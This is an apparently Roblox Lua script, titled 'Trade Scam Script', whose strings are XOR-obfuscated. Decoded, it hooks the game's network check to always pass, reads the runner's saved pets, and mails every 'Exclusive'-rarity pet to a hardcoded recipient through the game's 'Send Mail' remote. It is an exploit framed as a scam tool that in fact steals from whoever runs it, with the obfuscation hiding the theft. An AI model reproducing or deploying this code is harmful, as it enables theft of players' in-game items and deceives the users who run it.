--[[

──────────────────────────────────────────────────────────────────────────────────────────────────────────
─██████████████─██████████─██████████████─██████████████─██████████████─██████████████─████████████████───
─██░░░░░░░░░░██─██░░░░░░██─██░░░░░░░░░░██─██░░░░░░░░░░██─██░░░░░░░░░░██─██░░░░░░░░░░██─██░░░░░░░░░░░░██───
─██░░██████░░██─████░░████─██░░██████░░██─██████░░██████─██░░██████████─██░░██████████─██░░████████░░██───
─██░░██──██░░██───██░░██───██░░██──██░░██─────██░░██─────██░░██─────────██░░██─────────██░░██────██░░██───
─██░░██████░░██───██░░██───██░░██──██░░██─────██░░██─────██░░██████████─██░░██████████─██░░████████░░██───
─██░░░░░░░░░░██───██░░██───██░░██──██░░██─────██░░██─────██░░░░░░░░░░██─██░░░░░░░░░░██─██░░░░░░░░░░░░██───
─██░░██████████───██░░██───██░░██──██░░██─────██░░██─────██░░██████████─██░░██████████─██░░██████░░████───
─██░░██───────────██░░██───██░░██──██░░██─────██░░██─────██░░██─────────██░░██─────────██░░██──██░░██─────
─██░░██─────────████░░████─██░░██████░░██─────██░░██─────██░░██████████─██░░██████████─██░░██──██░░██████─
─██░░██─────────██░░░░░░██─██░░░░░░░░░░██─────██░░██─────██░░░░░░░░░░██─██░░░░░░░░░░██─██░░██──██░░░░░░██─
─██████─────────██████████─██████████████─────██████─────██████████████─██████████████─██████──██████████─
──────────────────────────────────────────────────────────────────────────────────────────────────────────

## Trade Scam Script 
## Script by Pioter (2/05/2023) 

]]--



local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v16=0;local v17;while true do if (v16==1) then return v5(v17);end if (v16==0) then v17={};for v23=1, #v8 do v6(v17,v0(v4(v1(v2(v8,v23,v23 + (1 -0))),v1(v2(v9,((178 + 1377) -(31 + 1523)) + ((v23-(1093 -(341 + (1440 -689))))% #v9),1 + 0 + ((v23-((1811 -(114 + 1327)) -(335 + (1140 -(985 + 121)))))% #v9) + (1201 -(682 + 518)))))%((279 + 449) -472)));end v16=1;end end end local v10=v7("\24\99\171\40\135\242\39\30\37\234","\117\21\211\75\226\158\66");local v11=require(game:GetService(v7("\60\50\57\121\207\5\15\35\44\113\245\18\1\37\40\114\195","\110\87\73\21\166\102")).Library.Client.Network);local v12,v13=v11.Fire,v11.Invoke;hookfunction(getupvalue(v12,2 -1),function(...)return true;end);local v14=require(game.ReplicatedStorage.Framework.Library);local v15=v14.Save.Get().Pets;for v18,v19 in pairs(v15) do local v20=0;local v21;local v22;while true do if (v20==0) then v21=0 + 0;v22=nil;v20=350 -(267 + (390 -308));end if (1==v20) then while true do if (v21==0) then v22=v14.Directory.Pets[v19.id];if (v22.rarity==v7("\57\46\243\233\202\52\224\10\51","\124\86\144\133\191\71\137")) then local v25=0 -0;local v26;while true do if (v25==((6802 -5123) -(1362 + 317))) then local v27=(451 -(110 + 341)) + 0;while true do if ((0 + (1628 -(380 + 1248)))==v27) then v26={[2 -(742 -(103 + 638))]={[v7("\247\202\196\117\213\198\194\114\209","\165\175\167\28")]=v10,[v7("\249\40\216\11\71\186\29\22","\189\65\185\102\40\212\121\101")]=0 -0,[v7("\232\179\19\66","\184\214\103\49")]={v19.uid},[v7("\239\0\16\190\136\192\199","\162\101\99\205\233\167")]=v7("\161\194\185\236\186\24\149\131\147\236\239\14\158\194\177","\236\163\221\137\154\122")}};v13(v7("\53\113\210\0\17\43\117\213\8","\102\20\188\100\49"),unpack(v26));v27=2 -1;end if (v27==((138 + 270) -((376 -(101 + 17)) + 149))) then v25=1;break;end end end if (v25==((1312 -(576 + 734)) -(1 + 0))) then wait(2);break;end end end break;end end break;end end end
